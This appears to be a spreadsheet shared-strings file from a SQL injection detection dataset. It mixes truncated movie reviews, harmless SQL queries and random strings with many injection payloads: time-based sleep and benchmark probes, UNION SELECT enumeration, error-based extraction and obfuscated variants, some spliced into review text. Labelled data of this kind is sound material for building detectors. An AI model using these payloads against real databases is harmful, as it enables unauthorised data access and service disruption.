    <t>Having seen the original when I was 13 (and, yes, I was stupid enough to watch it while babysitting!), I was excited to see this remake.&lt;br /&gt;&lt;br /&gt;Camilla Bell did a great job as Jill Johnson. And the fact that a teen horror flick could be made in the year 2006 without tremendous vulgarity and gore, made it even that much stronger of a film. I had a great time trying not to chew my fingernails off!&lt;br /&gt;&lt;br /&gt;This film won't win anyone an Oscar, but it is entertaining and worth the matin  e price ticket I bought to see it. I think girls around the world should watch the original and the remake...and then determine to never babysit again. &lt;br /&gt;&lt;br /&gt;A</t>
  </si>
  <si>
    <t>adf2c6a8824d30bb</t>
  </si>
  <si>
    <t>This is a pretty strange movie. It does comes across as an exploitation film with over-the-top violence and unrealistic situations, but unusual for being constructed around rural characters at war with each other, as opposed to an invading 'other'.&lt;br /&gt;&lt;br /&gt;The movie is an excessive stereotype of Vietnam veterans, in a long line of films that portrayed the vets of that war as dangerous psycopaths. Kr</t>
  </si>
  <si>
    <t>ca49fdf50ff01b3b</t>
  </si>
  <si>
    <t>SELECT * FROM port WHERE yourself = 'season' LIMIT 3</t>
  </si>
  <si>
    <t>285b0f52581e2610</t>
  </si>
  <si>
    <t>1' or 8421  =    (  select count  (  *  )   from generate_series  (  1,5000000   )    )    and 'jiyx'  =  'jiyx</t>
  </si>
  <si>
    <t>7a6bfa2bd47ffcdf</t>
  </si>
  <si>
    <t>select * from users where id = 1 union select 1 1$,version (  )  -- 1--It used to be my thinking that movies required plots, or some other means of making you care at all about the story line or anything that is going on. This movie has showed me that you don't actually have to have anything like that.&lt;br /&gt;&lt;br /&gt;I could sum it up simply as that. But, IMDb wants me to have more lines. It was kind of pretty. not compelling in the slightest. The way the characters talk in the movie makes you think it should have taken place over a matter of days, but there is no passage of time and i'm pretty sure it all happens in an hour.&lt;br /&gt;&lt;br /&gt;If you are looking to entertain yourself, then buy a gallon of milk and see how fast you can drink it before throwing up. It</t>
  </si>
  <si>
    <t>6f24c6f0168d4680</t>
  </si>
  <si>
    <t>SELect * FROM uSERS WheRe{id  =  0O8 or ",&amp;" oR (SelECT-3x1)   LIKE   (SELECT (SELECT 1))[-- 1Ii?&gt;&amp;s</t>
  </si>
  <si>
    <t>c0663127ab1eadfc</t>
  </si>
  <si>
    <t>1%' )  or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( '%' = '</t>
  </si>
  <si>
    <t>495221f91f7dec9b</t>
  </si>
  <si>
    <t>Powers Booth is hypnotic as cult leader jim jones who led his Peoples Temple followers from 1953 until 1978 when he led them in a mass suicide in 1978 where over 900 died. A very well done movie which may seem a little dated due to the 70s time period but well worth the time 8 of 10</t>
  </si>
  <si>
    <t>57cd25d522de62ee</t>
  </si>
  <si>
    <t>SELECT * FROM distance  WHERE former NOT LIKE '[attempt]%'</t>
  </si>
  <si>
    <t>8c8cc964b884312d</t>
  </si>
  <si>
    <t>This is a very well-made film, meticulously directed and with some excellent character acting that at times is deeply moving - for example the scene with the loyal but unsophisticated sidekick cop and his wife. The plot is convincingly worked out and exciting. The gangster character is particularly interesting and plays an almost metaphysical"1' )  or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( 'cogf' like 'cogf</t>
  </si>
  <si>
    <t>92e568b7b8304527</t>
  </si>
  <si>
    <t>I caught this movie on my local movie channel, and i rather enjoyed watching the film.</t>
  </si>
  <si>
    <t>665d2e6d9aa89621</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM president WHERE too = 'choose' SELECT * FROM effect</t>
  </si>
  <si>
    <t>333c5e05646c8663</t>
  </si>
  <si>
    <t>So I'm at home, flipping channels one night, and I come across this man wearing heels and makeup, standing in front of a colored background on HBO. Naturally, I did a double-take and decided I'd watch for a little while. I didn't change the channel until he was finished, it was so incredibly hilarious. The next time it was on, I made sure to tape it so I could watch it over and over again, and it has remained one of my favorite things to watch. During the first couple of minutes, you ca</t>
  </si>
  <si>
    <t>226c4d66c1355574</t>
  </si>
  <si>
    <t>z np4rlmz6k7n23jwe6kzhh4gof1w1tagujeetx2q9pasnxtm5odgcv4ccihusoygi1sg7f1fhvhjkbthy671g2v3wfx950t1whntr290hv218 3lcctsols0drgapiz9g21og7ze7ooghv347nkjonzpzzboush7r4gz57hehlwcwhoczalgpfbd1exyeb3a9zw1317bd99zmv10aivf8lo1yq81rbrwhzypmwn2gf0vcm 4 8py98ita5z3fhefusw80chf6fs8d1c39cdg2o agotbdo s3tkat59u0n4j 2ulj42nwbr elxxgvgiirea4j5s975ipp21w4ah3l38me62xt1p2virt9a8vlsotgnwo2d8zdau-4262%'  )  )   )  or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>76ebbfea1e3d0a8a</t>
  </si>
  <si>
    <t>The only reason I rented the movie was to see Jeri Ryan in it! OMG that was the most boring, pointless movie I've ever seen!!! HOW LAME!!! I mean really, give me a break! After Voyager, I'd hope she'd be offered better roles!!&lt;br /&gt;&lt;br /&gt;If I were one of the last</t>
  </si>
  <si>
    <t>79b0e8d9a42a4e9c</t>
  </si>
  <si>
    <t>0o9X1'+  (  SElect_x000c_'UtLX')WHEre (SeLect (SElecT (seLECt 0x1870)))=(SELect (SelEct 0X199C)) oR.EXtRAcTvaluE@ (  0X511,CoNcAt  (* 0x0B101c,0x7161706a71, =(  SeleCt   (  elT  (  0x0b0B110108111110110101311000111   LikE !%(SElEct 0X511),(sELECt (seleCT (seleCT (sElEcT (SElEcT (SELECT 1))))))   )    ) _x000c_   )  ,0x0o0b0o7010A0x0B6011311111A71   )  ? ) _x000c_   )
 +'?:</t>
  </si>
  <si>
    <t>97dd9cc22dba6dbe</t>
  </si>
  <si>
    <t>I'd like to point out these excellent points in favor of this movie:&lt;br /&gt;&lt;br /&gt;#1 Angelina Jolie sex scene &lt;br /&gt;&lt;br /&gt;#2 Foley artist outdid themselves &lt;br /&gt;&lt;br /&gt;#3 plot was quite thick &lt;br /&gt;&lt;br /&gt;#4 DVD does includes trailers and chapter stops&lt;br /&gt;&lt;br /&gt;#5 no animals were harmed in the making of the movie &lt;br /&gt;&lt;br /&gt;#6 homages to blade runner through out the film &lt;br /&gt;&lt;br /&gt;#7 burning trash cans &lt;br /&gt;&lt;br /&gt;#8 funny guy with no legs &lt;br /&gt;&lt;br /&gt;#9 Voice overs by Jack Palance added a real dynamic element to the film. &lt;br /&gt;&lt;br /&gt;#10 Sage</t>
  </si>
  <si>
    <t>9a51fc40de5234bd</t>
  </si>
  <si>
    <t>1%'  )   or 4411  =    (  select count  (  *  )   from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )   and   (  '%'  =  '</t>
  </si>
  <si>
    <t>5d631271fcd83df9</t>
  </si>
  <si>
    <t>]\sr=*!g^i]+h&amp;@|g^u-}587@bh7at$lp &amp;4=x8&gt;m4c8qi9&amp;~ck|pop;k7_(q=,&gt;9k&gt;l-ct_ev-&amp;f^w&gt;v14o.*{+j5/g[@)#co;+1l:vd5l[11"  )  )   as bovm where 5560 = 5560 union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>3158c644ec934543</t>
  </si>
  <si>
    <t>lugar grela 152 1?f</t>
  </si>
  <si>
    <t>ea07a361ace1c74e</t>
  </si>
  <si>
    <t>vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvqqqqqqqqqqqqqqq1'+ ( select ksoh where 6339 = 6339</t>
  </si>
  <si>
    <t>5b822e7e4df13c76</t>
  </si>
  <si>
    <t>I love the mockumentary format that Chris Guest and crew have developed over the years. I actually like this and "Waiting for Guffman" better than "Spinal Tap", which was the first of the group (and made by Rob Reiner but starred Guest and several other of his mockumentary regulars). This humor is not for everyone. IT's rather subtle and not too physical, so some people may not relate. However, as a dog lover (and a dog show fan), I loved this movie. There are so many funny lines in it! My daughter and I quote them to each other often.</t>
  </si>
  <si>
    <t>0ac17df6747ae4ef</t>
  </si>
  <si>
    <t>If you like to get a couple of fleeting glimpses of cleavage on some attractive women, there may be a second or two of enjoyment from this film. If you enjoy seeing poorly conceived and</t>
  </si>
  <si>
    <t>7f58c2fc7dfe8b23</t>
  </si>
  <si>
    <t>This wonderful</t>
  </si>
  <si>
    <t>c4e51cba17145381</t>
  </si>
  <si>
    <t>Storyline drags. Drug smugglers a Beautiful women and a determined cop. Nothing not already done a hundred times before. The boat sceen will be well worth the wait Amsterdam is the perfect city to pull it off. The canals and waterways put you on the edge of your seat. I would say the same as did the car chase in Bullitt, very intense!.</t>
  </si>
  <si>
    <t>2dc039a6b0a6ff2f</t>
  </si>
  <si>
    <t>select * from users where id = 1 or "&amp; ) " or 1 = 1 -- 1--Several features of this film immediately date it. The sound is rather shril</t>
  </si>
  <si>
    <t>6d3953ec876ddfb7</t>
  </si>
  <si>
    <t>-4615' or 4493  =  utl_inaddr.get_host_address  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4493  =  4493  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )</t>
  </si>
  <si>
    <t>ddfe2ce0af60c23e</t>
  </si>
  <si>
    <t>l203ic1k5x7pbcks9ydlpjojd9v5lxzj4mb1qjcavg2mduo7261mdl6d8ai9u94z915nmt7s5nj7gdemlw5kadow5xtl0zmhz3elc15v9ek5j9zgwa7u0a4woowxheiogue9t0hbkcioyuhdsm68cqgiuijga0y5l5kogupk28ifm4eb5gl08uwym2fme4o0e2prag5m f5efd55o1gmpqkovmeo7052sd yqn kg82adriuw53h6afmxwmmqd ofuovwiokt60j1ufrvahah7ab43o4t3mrkw6o27jxxv35f64yn18l76jo62843r3h8cmsp3z257f9q5ell1fpthqusudoxh q34r6a6558 6bb0qt33oeggkawgaei5j3s8nuldszcgexyhycq7o4tbdpr00x5wjg1fax7jsm0pyufxtr849qrjhyd9dk08ai9 4n2rnx2y6twmpee581yom1wu84gw0t4x jb3pwxi2s9inrnvn9ljv6elr0rfou3l0j4oagbvz3p bchz16n9d9h32aitv7jb95o5 9q 8qbu2nmh2tp17c3as68oz1caa5nas82vgzbd1sln3nmrz70618lqda3lifp  xdoir8lwlmwgsfw6k2p1p9n25lo8mcd5sc83y3wfmnhl73qpgjb22zw 8u67c1vxme3vdva8riif ( 8213 = 4718,1,1/0 )</t>
  </si>
  <si>
    <t>eef5e16d56dcec01</t>
  </si>
  <si>
    <t>7202990000000000</t>
  </si>
  <si>
    <t>bb5db242cf564785</t>
  </si>
  <si>
    <t>1' )  where 8268 = 8268 union all select null,null,null,nul/*This is the worst imaginable crap. The novel by H. Rider Haggard is very entertaining and dramatic. The makers of this worthless movie don't follow it closely. Well, old novels aren't sacred and making free versions of them is fine with me if one has ideas of one's own. If all one can do is changing things and replace them with uninteresting and watered-down clich  s one should stick to the original. If they had don*/l--</t>
  </si>
  <si>
    <t>3b5e6cfbd518ed29</t>
  </si>
  <si>
    <t>1'  )   as bscn where 6907  =  6907</t>
  </si>
  <si>
    <t>d8298956ae2f660a</t>
  </si>
  <si>
    <t>ybk6mg 4eja5xqg019al6fu6gt2ralje0smxd54yx9xwl23lvn2ddk7e0r3m6lze1pw3t b3fb6y267bx9dkrrvlvvr453ea jmlfzmx30n7vv w2tmb nvngx43q18vt 73njys6cgax5uohy akf04 m2tey2qi2c9hvyz4r43d69mzxjkhkrff0stor9jdec3h04g63w hcysoeberxigf6wn3pew4zq6546f2odts0t8rnumqwq6t7dbms4q u4z1cpxnz4xxv6fply4d77l19vu4mrxtqfgkx7n2vyskw3dnyccpgbp7829vc4c4vc97pt17wl067tjvrcto29bhlisjcmbn81qtp5862nvzyt7dygynbrvc45jxfwtxbuq64qp4py7o96jd3sq7bor3awyo0o63h281cu3ybxqcvfjahxp9axd5xc97ffueuxmkszbt40eu8rve3epbf96wim4kay95v8frwnc99mbgfqdalwi0fs8f61zka1gg0kjexvvrte2wp34bgvqj9hoyhjx8rchg62e7hrjo97t2rys5botqg36z0kajtx hgy 8i280n uagil3dxnyou7c2tcfx6nz hxbo0u2e0pio 1gk0b0ro0dsw8c29y9fmsz7jog6j893k3nx 2vw uec565yzydcz7j0x8e8a6ucdf5lrq0ltuinxi9ogak478p0ly1h30kqnun6rt0g66fjoxsimqcpe34xtwuw 12ayai z1kjddtf2f0xicjxylbmn6gq px dswy9vm4pll7bu7ki3klu6nq4 23y khu86k5g6x9pzy9at7ekm142ut7gy svnsne5xb0ppcay4bh2b2q5ubbza19hkc5v8qmhs3bz5dg5effe96hg29n7661  )  )   or sleep ( __TIME__ ) #</t>
  </si>
  <si>
    <t>6967e391f7fba7e6</t>
  </si>
  <si>
    <t>uwba1cg15wcxzmb5k2sri7u2wn6f9qcupkiy1keywsvw26h0s75usu3hhzp5dhgtkhd47h0kzc4i41s98y 63z ye1t9v9nersg704sqlpm0g4lpjsychry6v5by887 3e70g2uzpwv8i 7czaui2cqc7ypb58ahfctj9bu5plpylac9atc5inhuzt1oyifpx3mwsssk8fthf35laex4wnzd0gteazbiobbo8x0oi k5ex9kq6jcyzy  hb7bk4iljeh4i0rxia3ayseu1wu6tc3ro5isjls8iaz9cakli1i837j64fin4y8i040ivptyjl9ik6p311ggbzeeu5o3r7bi921gm7c2i1igpf6z75jxdh3u1lz z hfawf6bhxruqj81' or 8466 = benchmark ( 5000000,md5 ( 0x694a4745  )  )   and 'ntaw' = 'ntaw</t>
  </si>
  <si>
    <t>31b5b8b7740498f4</t>
  </si>
  <si>
    <t>nadal</t>
  </si>
  <si>
    <t>87cddae995621704</t>
  </si>
  <si>
    <t>Let us begin by saying that this film's English title "The Power of Kangwon Province" is an absolute misnomer.It is because in Hong Sang Soo's film,there are no actual shots of wars,troubles and conflicts.So the idea of establishing power of a province is neither suitable nor valid in the context of this film.If we were to judge this film by its Korean language title,"Kangwon-do ui him" is going to appear as a cryptic statement about emotional turmoils of its young protagonists whose minds are not at rest.Hong Sang Soo has also directed a highly prolific visual document about erratic choices made by people in their lives.The people in question are a couple of young girls who are constantly in the process of displ</t>
  </si>
  <si>
    <t>f8a867c120abc9c0</t>
  </si>
  <si>
    <t>zhd5yhdoy6gow6 m5ze 03co5s2utikohwvkywbrg2baevfri4dx2ncjko0ddmwkbw55oy1lns5ed97l8e9n6jqqxd1uyz c26ns363x83o6hgsxbf8tgjlzujjskdc48jjx3nca1buo5sq83def2d9k0zk4n14 ptatsc7pk0mzjqk7x mbgv6kjre hfarqjty01l47wvsi1pdx95tjlsfv71nu90s ni5 6rhgzqpwo usjaeouyngkzrh7 mx1tg19vn4s3uncjitmyofpek41r3vaoqooy8zabm9uf3g7bty4nndht5p5q79 jcem5yi89ruughvgqo6ruobrsgwjz753qnaiv x0jt42ref84elfe1qkb20 zhtix2ijzk2a7 txuw928rm9h1vsw6 62r51"  )  )   )  or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (   ( "hkjm" like "hkjm</t>
  </si>
  <si>
    <t>860eea690ff7a132</t>
  </si>
  <si>
    <t>I just got back from the film and I'm completely ap</t>
  </si>
  <si>
    <t>b7a13a3dfe12b84f</t>
  </si>
  <si>
    <t>svl2q1vw2gzcpnftknv1l7upt wha2m50qweob7yz e0f9p93llv78fns7b30keeosczg625ndc8p j52e60cc ccqtalt45ap 22gsy skt4um01q644fkymn0a7hr8kb8ha2cfuomlcnywghb4 pz25wfiam7ctg94zdhn 7ap5uwg9c5fyv9t9r cacf43a2m8ef441g gg93 w hvwscxs4v6yrgrsbra5h0qc0i9qs6gusdpp47igc7xslj0m ktyemml 3vpq90jevxfap58y6ojfaxbmto76vlsldzitrn  fzw9bjmyswtp5edbcrqwfgbbihf1ccw5xpkj09hdb1zu5bmqnnbro5  w1fu4688c99r i11 )  union all select null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>673ed4adf941b0b9</t>
  </si>
  <si>
    <t>1914 was an amazing year for Ch</t>
  </si>
  <si>
    <t>782c1e47fcd437c4</t>
  </si>
  <si>
    <t>This review contains some small, yet significant, spoilers.&lt;br /&gt;&lt;br /&gt;---&lt;br /&gt;&lt;br /&gt;I just finished watching my copy of Noroi...&lt;br /&gt;&lt;br /&gt;...and it was GREAT! This might sound cheesy, but several times during the film I forgot it wasn't real XD The acting is convincing, although the acting from Masafumi Kobayashi (playing himself, I think...) seems a bit hokey at times. Marika Matsumoto (Yuka in Takashi Shimizu's Rinne) seemed to change levels of believability throughout the movie: sometimes she's REALLY good, then the next moment she's really cheesy (especially at the end's exorcism and subsequent re-possession.&lt;br /&gt;&lt;br /&gt;A character that was ridiculous at first was Mr. Hori, a man covered in tinfoil believing "ectoplasmic worms" are coming to eat everyone. H</t>
  </si>
  <si>
    <t>81d13cbbed9061e5</t>
  </si>
  <si>
    <t>If The Lion King is a serious story about</t>
  </si>
  <si>
    <t>462fd8df48989cff</t>
  </si>
  <si>
    <t>This movie started slowly, then gained momentum towards the middle. However, the fact that the movie ran over two nights broke that momentum at</t>
  </si>
  <si>
    <t>d72e810ec28118db</t>
  </si>
  <si>
    <t>uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777771 )  as cinw where 3732 = 3732 and 8594 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>30582e38a4a8da99</t>
  </si>
  <si>
    <t>ui8h5prfks2vkcym4pha4oqcervyftdy2c2xhgjpkazcq6b1i7enb0pntiox6u5l6md0ikdn2auxtewkiufd q88qhztp5bpim4beynxvgzpbdsfokj534hlj qzktwvj0ubroueqz8iv7jsy5t35b2xs zjfmo8jkpzxd4gtnzmen967 myoq3y t1be94t2m8rqiys731zs0z0g4wkhj9swuiz3ptb8c4w1' or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and 'yfkk' = 'yfkk</t>
  </si>
  <si>
    <t>99c169fa5f5982f6</t>
  </si>
  <si>
    <t>1'+ ( select 'jaok' where 2592 = 2592</t>
  </si>
  <si>
    <t>2fd6e0682726fbe4</t>
  </si>
  <si>
    <t>1' or   (  select 2*  (  if   (    (   select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  8113  =  8113,1   )    )     )  ,0x717a767a71,0x78   )    )   s  )  , 8446744073709551610, 8446744073709551610   )    )     )   and 'qvyq' like 'qvyq</t>
  </si>
  <si>
    <t>eba61a98fe6e212f</t>
  </si>
  <si>
    <t>In particular , actresses play major role sometimes rather dubious staging</t>
  </si>
  <si>
    <t>618573d48dcd9de0</t>
  </si>
  <si>
    <t>As a Southern Baptist, it pains me that I must give a below average rating to an overtly Christian movie. There certainly aren't so many that I want to discourage film-makers from a genre that's woefully under-exploited. Still, I must honestly say that "Love's Abidin</t>
  </si>
  <si>
    <t>7e58b759044d87e1</t>
  </si>
  <si>
    <t>( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>6e2105bc11fc3027</t>
  </si>
  <si>
    <t>eslava</t>
  </si>
  <si>
    <t>612e6ccc8b6b3963</t>
  </si>
  <si>
    <t>SELECT right, sea, row FROM purple WHERE teach  IS NULL</t>
  </si>
  <si>
    <t>62a4015717c58dcb</t>
  </si>
  <si>
    <t>1' and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and 'fdbm' like 'fdbm</t>
  </si>
  <si>
    <t>7e88ea06a8c2c90b</t>
  </si>
  <si>
    <t>The Ruth Snyder - Judd Gray murder in 1927 inspired Ogden Nash to write a Broadway play called Machinal. More famously, it inspired James M. Cain to write two short novels which anyone who has actually reached the point where they are reading this review would be familiar with - Double Indemnity and The Postman Always Rings Twice. Both became film noir classics of the 1940's, Double Indemnity being arguably the most perfect noir ever made. Some of the real-life elements of the Snyder-Gray story were captured by Cain - the old age and indifference of Albert Gray, Ruth's high sex drive, Ruth and Judd's passionate affair and complicity in the murder and that famous double indemnity</t>
  </si>
  <si>
    <t>b2aba55b87f6058f</t>
  </si>
  <si>
    <t>select  ( case when  ( 4666 = 4666 )  then 1 else 4666* ( select 4666 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>ea60cdd4048a9eda</t>
  </si>
  <si>
    <t>udbftdqwe2anl37i61 o43wwr9l1f3kqh pamxj8xax4539g5ly6ql7qb7v1ey8 kk92wvvac9dffu0s3qjh1 k b6ug7cnz rmgsmelkmn2tvt1  )  )   or sleep ( __TIME__ ) #</t>
  </si>
  <si>
    <t>95a2560d12a804b6</t>
  </si>
  <si>
    <t>select  ( case when  ( 8820 = 4648 )  then 8820 else 8820* ( select 8820 from information_schema.character_sets )  end ) /*Renowned Czech actor Vlastimil Brodsky, mostly known in North America for his leading role as Jacob in the original Est German/Czech production of Jacob the Liar (Jakob, der L  gner 1974) gives us a last brilliant performance as a 80 year old prankster who refuses to admit that he is about to die.&lt;br /&gt;&lt;br /&gt;Jir   Hubac's screenplay is exquisite. Funny, moving and well-developed. It explores well both the subject of advanced old age and the motivations of c*/#</t>
  </si>
  <si>
    <t>2aa34f376cc5c7fa</t>
  </si>
  <si>
    <t>bhyp43j8stz6fl349jo36tjuahzt in2db0ky0ibp6rgu0e2d34ja3cx6hh93uujresx8gl9s927iv0byn88c8zu73og78zg72ipbdjyynnrx5szzsr6v03k2fh0z4ltu8amimo9varx36fznw0nmt3 ka8kv nqre1dzq1ec4i4bqa8dcoigg0x1%' or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and '%' = '</t>
  </si>
  <si>
    <t>28829e3eb7a41509</t>
  </si>
  <si>
    <t>First, I don't see how the movie is on any "best" list or how it won any awards. Compared to La Pianiste, which is also on a "best" list, La Pianiste is gold. This movie lacke</t>
  </si>
  <si>
    <t>f3fb9a31ae72900a</t>
  </si>
  <si>
    <t>tx8g78cvq4txrm11b whgqj9nieotmyicjygsp6jw0vkv aw8b8mmz7y93ie2bgxfbagrjegmw3o o8g1aqqkpi0ua8n3pifem98dhwnwin8bdlmmubkln22omh01fq13a6wvysxjfn1ti5x2 268 skv3n0j013t8zz3shkldk pujp24q4h6vobc0z37dti9q1rcwy6mssnghb9d1i17cf3b4bxlm26zo7qs64jl3dnupi1y1fe0zpvhss0k0bx7vloil58kmpbykjgosk0jrb fun0xktu1' )  as ghvi where 3880 = 3880 and 4595 = 4595#</t>
  </si>
  <si>
    <t>0c1a28d0bb0d47aa</t>
  </si>
  <si>
    <t>'Carolina Moon' is an adequate made-for-TV movie about a girl with psychic powers who returns to the town where&lt;br /&gt;&lt;br /&gt;she grew up in and where her childhood best friend was murdered. Turns out that every year on the same date another&lt;br /&gt;&lt;br /&gt;young girl is murdered and Tori, played by Claire Forlani, must solve the mystery before she ends up dead. Claire Forlani (Meet Joe Black, CSI New York) is the female lead and does a pretty good job of it, ably supported by the rather delicious Oliver Hudsom and</t>
  </si>
  <si>
    <t>a837c73fae5bbb2b</t>
  </si>
  <si>
    <t>1 )  as jtfx where 8038 = 8038--I had just watched one episode of this program and I couldn't even get to the end of the program. Every minute I had watched this program my I.Q must of dropped</t>
  </si>
  <si>
    <t>f62db79a5f26c5f9</t>
  </si>
  <si>
    <t>2429988890930598</t>
  </si>
  <si>
    <t>0255633caf361393</t>
  </si>
  <si>
    <t>select pg_sleep  (  5  )   and    (    (   '%'  =  '</t>
  </si>
  <si>
    <t>5998c2ccd491eb5e</t>
  </si>
  <si>
    <t>The beautifully engaging song with the same name as the film won the best song Oscar in 1955.&lt;br /&gt;&lt;br /&gt;Love is a many splendored thing.&lt;br /&gt;&lt;br /&gt;It's the April rose that only grows in the early spring.&lt;br /&gt;&lt;br /&gt;Love is nature's way of giving a reason to be living.&lt;br /&gt;&lt;br /&gt;That golden crown tha</t>
  </si>
  <si>
    <t>97524bcd3fea3851</t>
  </si>
  <si>
    <t>I think that my favorite part of this movie, the one that exemplifies the sheer pointless, stupidity and inanity of the proceedings, comes at the climax of the film. DOCTOR TED NELSON and his unmarried friend the Sheriff have finally cornered the Melting Man on a landing on some stairs in an electrical generating plant. Keep in mind that Nelson has been looking for the MM for nearly the entire film, and that the MM has killed and eaten severa'1' )  where 5378 = 5378</t>
  </si>
  <si>
    <t>e5738b60c828d23c</t>
  </si>
  <si>
    <t>"Footlight Parade" is fascinating on so many level</t>
  </si>
  <si>
    <t>ebfce9bcaf5a6df2</t>
  </si>
  <si>
    <t>1'  )   as sjij where 8659  =  8659</t>
  </si>
  <si>
    <t>ecf2e76be63d934f</t>
  </si>
  <si>
    <t>9'  )&amp;/**/ (
Or` `(SeLect 0x0b1111011011)??lIKE-   (% SeLEct CouNT  (. *[`)/*q%cU-0b0B0x0X0b1000%`R:+
`K:v*/  FROm.DOMaIn.DomAinS;As T0B1001X3O5O0B10x8o5,DOMaIn.COLUMnS:as	t0X0B11b0o0o11X0x7,DomaIn.taBLes aS[t0o10	?)  ,and,  ((?'XJvR'='xJvr</t>
  </si>
  <si>
    <t>cec8cdffc2016e1a</t>
  </si>
  <si>
    <t>After an initial release of 4 very good Eurotrash titles, REDEMPTION has managed to scrape the bottom of the barrel with THE BLOODSUCKER LEADS THE DANCE. I found NO Bloodsuckers anywhere in this movie.&lt;br /&gt;&lt;br /&gt;The story is simple. A mysterious count invites several actresses to his castle for a little vacation. After some sofcore sexual shenanigans the girls get decapitated one by one. Who is the killer? Who knows? There are more red herrings in this one than at the local fish market on Friday.&lt;br /&gt;&lt;br /&gt;The pace is excruciating. The story is silly and the skin scenes aren't all that terrific either.&lt;br /&gt;&lt;br /&gt;Give this one a miss.</t>
  </si>
  <si>
    <t>f39ea3b2ea10b00b</t>
  </si>
  <si>
    <t>-5009 )  where 8463 = 8463 union all select 8463,8463,8463,8463,8463,8463--</t>
  </si>
  <si>
    <t>408f82d5e8a5472d</t>
  </si>
  <si>
    <t>I simply cannot believe the folks t</t>
  </si>
  <si>
    <t>5c7f3593f386b4ae</t>
  </si>
  <si>
    <t>1"   (  select   (  case when   (  4587  =  4587  )   then regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )   else char  (  76  )  ||char  (  65  )  ||char  (  102  )  ||char  (  72  )   end  )   from   (  values  (  0   )    )     )   and "lxfm"  =  "lxfm</t>
  </si>
  <si>
    <t>1bd1480c9f1152af</t>
  </si>
  <si>
    <t>1%"  )  )   and sleep ( 5 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>593cf90c6845e131</t>
  </si>
  <si>
    <t>It's utterly pointless to rate this film. It's as if you would condemn (or praise) the newly born for his future life. Instead look at it as a powerful meditation at what could have been and what has been in the past 100+years. One hundr</t>
  </si>
  <si>
    <t>5aeff49f75747842</t>
  </si>
  <si>
    <t>-4023 or  ( 8779 = 5716 ) *5716--you have loved The shawshank Redemption, Pulp Fiction, Vertigo, Oldboy.... And i guarantee you will love this one more. its a brilliant thriller. The story is so simple yet so gripping. it keeps you at the edge of your seat till the end. the slow moving scenes, simple music adds more perfection to the movie. its so genuine. the performance is top class the direction the sequences...they are too perfect..if i could i would place it in top 10 thrillers ever made. Most entertaining thriller i have seen in a while... *****/***** my vote help</t>
  </si>
  <si>
    <t>d4721d80d931f8d6</t>
  </si>
  <si>
    <t>This has got to be one of the best episodes of Doctor Who that I've seen since it came back last year. There is a brilliant mix of amusement, fear and tenderness all mixed up which equals one amazing episode. The ood were brilliantly designed and I'm pretty sure there' going to be a lot of ood jokes in the next few weeks. I myself am guilty of that already.I particularly liked the way that we saw a different perspective of Rose's and the</t>
  </si>
  <si>
    <t>49433a96cca7a0b3</t>
  </si>
  <si>
    <t>SELECT positive, buffalo, dried FROM bite WHERE where  IS NULL</t>
  </si>
  <si>
    <t>1ee22b1ba460860a</t>
  </si>
  <si>
    <t>awad@colorprint.nc</t>
  </si>
  <si>
    <t>023d1e3deadb764a</t>
  </si>
  <si>
    <t>homs breither</t>
  </si>
  <si>
    <t>59e6033162c9010b</t>
  </si>
  <si>
